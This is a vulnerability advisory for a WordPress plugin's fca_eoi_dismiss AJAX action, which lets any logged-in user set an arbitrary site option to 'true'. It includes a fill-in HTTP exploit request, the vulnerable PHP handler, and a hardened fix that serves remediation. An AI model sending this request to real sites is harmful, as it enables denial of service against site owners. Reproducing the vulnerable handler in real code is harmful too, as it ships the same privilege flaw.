## https://sploitus.com/exploit?id=WPEX-ID:3167A83C-291E-4372-A42E-D842205BA722
Once the site has recorded at least 25 conversions through the plugin, a notice is shown in the administration panel to every logged-in user, regardless of role.
Clicking the "Dismiss" button invokes the `fca_eoi_dismiss` AJAX action with two parameters: `nonce` and `option`.
The `option` parameter is not sanitized before it is used in this line of code:
```php
# campaign-monitor-wp/includes/eoi-post-types.php (line 1938)
if ( update_option( $option, 'true' ) ) {
```
Since the AJAX action's callback performs no additional privilege checks, an attacker with a Subscriber+ role can set any WordPress option to the value `true`.
Because the value is always `true`, standard attacks such as changing the site URL or the default role for new users are not possible, but the flaw is easy to use for denial of service by overwriting options that belong to plugins, themes, or WordPress core.
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Cookie: <YOUR AUTHOR+ COOKIES>

action=fca_eoi_dismiss&option=<THE OPTION YOU WANT TO SET TO TRUE>&nonce=<YOUR NONCE>
```
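For comparison, the handler shape that produces the flaw beside a hardened version. This is an added example, not the plugin's own code: only the `update_option( $option, 'true' )` line comes from the advisory; the `wp_ajax_` hook name follows the WordPress convention for the `fca_eoi_dismiss` action, and the nonce action string and allowed option name are placeholders.

```php
<?php
// Added example, not the plugin's code. The hook name follows WordPress's
// wp_ajax_{action} convention; 'fca_eoi_nonce' and 'fca_eoi_notice_dismissed'
// are placeholders, not names taken from the plugin.

// Vulnerable shape: the nonce is verified, but the option NAME comes straight
// from the request and no capability check gates the handler, so any
// logged-in user can flip an arbitrary option to 'true'.
function fca_eoi_dismiss_vulnerable() {
    check_ajax_referer( 'fca_eoi_nonce', 'nonce' );
    $option = $_POST['option'];                 // attacker-controlled key
    if ( update_option( $option, 'true' ) ) {   // writes any option
        wp_send_json_success();
    }
    wp_send_json_error();
}

// Hardened shape: require a capability, sanitize the key, and accept only
// the option(s) this handler exists to write. The request can then no
// longer choose which option is modified.
function fca_eoi_dismiss_hardened() {
    check_ajax_referer( 'fca_eoi_nonce', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $allowed = array( 'fca_eoi_notice_dismissed' );   // allowlist of writable options
    $option  = isset( $_POST['option'] )
        ? sanitize_key( wp_unslash( $_POST['option'] ) )
        : '';
    if ( ! in_array( $option, $allowed, true ) ) {
        wp_send_json_error( 'invalid option', 400 );
    }
    update_option( $option, 'true' );
    wp_send_json_success();
}
add_action( 'wp_ajax_fca_eoi_dismiss', 'fca_eoi_dismiss_hardened' );
```

A nonce alone only proves the request came from a page the user loaded; it says nothing about whether that user should be allowed to write site options, which is why the capability check and allowlist are both needed.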